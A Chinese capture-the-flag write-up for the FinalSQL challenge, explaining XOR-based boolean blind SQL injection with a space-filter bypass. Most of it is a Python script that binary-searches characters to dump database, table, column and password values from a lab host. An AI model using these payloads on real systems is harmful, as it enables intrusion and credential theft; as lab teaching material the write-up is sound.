[极客大挑战 2019]FinalSQL

考点

SQL盲注
bypass空格

题解

题目提示SQL盲注，过滤了很多关键词

if mid like limit union and | & *  /**/ 空格

输入 id=1^0 返回正确
语句如下：
0^(ascii(substr((select(database())),1,1))>102)
ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>mid
若SQL语句为真则返回正常，为假则返回ERROR

select(group_concat(schema_name))from(information_schema.schemata)

二分法

假设第一个字符的ASCII码为96

low  high  mid
32   126   81
返回正常则为真，第一个字符的ASCII码大于81
82   126   104
返回ERROR则为假，第一个字符的ASCII码小于等于104
82   104   93
返回正常则为真，第一个字符的ASCII码大于93
94   104   99
返回ERROR则为假，第一个字符的ASCII码小于等于99
94   99    96
返回ERROR则为假，第一个字符的ASCII码小于等于96
94   96    95
返回正常则为真，第一个字符的ASCII码大于95
96   96

脚本如下

import requests

url = 'http://5d9d1cb2-97fb-46b6-87e2-0fd16174256b.node3.buuoj.cn/search.php?id=' 

# geek
def get_database():
    flag = ''
    for i in range(1, 50):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        while low < high:
            payload = f"0^(ascii(substr((select(database())),{i},1))>{mid})"
            url_t = url + payload
            r = requests.get(url=url_t)
            
            if 'ERROR' in r.text:
                high = mid
            if 'Click others' in r.text:
                low = mid + 1
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break

# F1naI1y,Flaaaaag
def get_table():
    flag = ''
    for i in range(1, 500):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        while low < high:
            payload = f"0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{i},1))>{mid})"

            url_t = url + payload
            r = requests.get(url=url_t)
            
            if 'ERROR' in r.text:
                high = mid
            if 'Click others' in r.text:
                low = mid + 1
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break
# F1naI1y: id,username,password
# Flaaaaag: id,fl4gawsl
def get_column():
    flag = ''
    for i in range(1, 500):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        while low < high:
            payload = f"0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1))>{mid})"

            url_t = url + payload
            r = requests.get(url=url_t)
            
            if 'ERROR' in r.text:
                high = mid
            if 'Click others' in r.text:
                low = mid + 1
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break

def get_flag():
    flag = ''
    for i in range(1, 500):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        while low < high:
            # payload = f"0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),{i},1))>{mid})"
            # payload = f"0^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})"
            payload = f"0^(ascii(substr(reverse((select(group_concat(password))from(F1naI1y))),{i},1))>{mid})"
            url_t = url + payload
            r = requests.get(url=url_t)
            
            if 'ERROR' in r.text:
                high = mid
            if 'Click others' in r.text:
                low = mid + 1
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break
get_flag()